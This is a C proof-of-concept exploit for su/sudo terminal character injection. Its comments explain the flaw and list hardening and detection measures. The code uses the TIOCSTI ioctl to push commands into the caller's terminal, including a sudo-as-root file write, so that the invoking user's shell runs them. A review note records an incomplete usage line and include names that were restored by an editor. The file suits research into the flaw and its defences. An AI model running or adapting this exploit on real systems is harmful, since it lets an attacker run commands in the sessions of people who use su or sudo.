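/*
 * sploit-poc.c -- su/sudo arbitrary character injection POC
 *
 * Usage:
 *   % gcc -o su-sploit-poc su-sploit-poc.c
 *   % su -c ./su-sploit-poc&
 *   % sudo -u ./su-sploit-poc&
 *
 * NOTE(review): the su/sudo lines are reproduced as found. "sudo -u" has no
 * user name, so an argument was probably lost in extraction together with
 * the header names of the four #include lines (restored below from the
 * symbols the code uses).
 *
 * What it demonstrates: a command started through su/sudo keeps the
 * caller's terminal as its standard input. TIOCSTI queues bytes on that
 * terminal as if they had been typed, so they are read by whichever
 * process reads the terminal next -- typically the invoking user's shell,
 * which runs with the caller's privileges rather than the target user's.
 *
 * Hardening / detection:
 *   - sudo: "Defaults use_pty" in sudoers runs the command on its own
 *     pseudo-terminal instead of the caller's.
 *   - su (util-linux): the --pty / -P option does the same for the session.
 *   - Linux: sysctl dev.tty.legacy_tiocsti=0 rejects TIOCSTI from callers
 *     without CAP_SYS_ADMIN (kernels that provide the knob).
 *   - Audit: TIOCSTI has few legitimate users, so an audit rule on ioctl()
 *     with that request number (0x5412 on x86 Linux) is a low-noise signal.
 */

#include <stdio.h>      /* perror */
#include <sys/ioctl.h>  /* ioctl, TIOCSTI */
#include <sys/types.h>  /* pid_t */
#include <unistd.h>     /* fork, sleep */

/*
 * Forks, lets the child exit immediately, then has the parent wait one
 * second and push the payload into the terminal on fd 0 one byte at a time.
 *
 * Returns 0 on success (and in the child), 1 if fork() or any ioctl() fails.
 */
int main (void)
{
  /* Text queued on the terminal; each '\n' completes a line for the reader. */
  const char *payload = "id\nsudo -u root touch /root/ciao123\necho 'hello'";
  int c, i;
  pid_t pid;

  pid = fork ();
  if (pid == -1)
    {
      perror ("Can't fork");
      return 1;
    }

  if (pid == 0)
    {
      /* Child: nothing to do, only the parent continues. */
      return 0;
    }

  /* Parent: pause before injecting (presumably so the terminal's next
     reader is waiting for input -- the source does not say). */
  sleep (1);

  /* Keep stuffing characters into the keyboard buffer... */
  for (i = 0; (c = payload[i]) != '\0'; i++)
    {
      /* The kernel reads a single byte at &c. Where TIOCSTI is refused
         (see the hardening notes above) this fails on the first byte and
         nothing is queued. */
      if (ioctl (0, TIOCSTI, &c) == -1)
        {
          perror ("ioctl() failed");
          return 1;
        }
    }

  return 0;
}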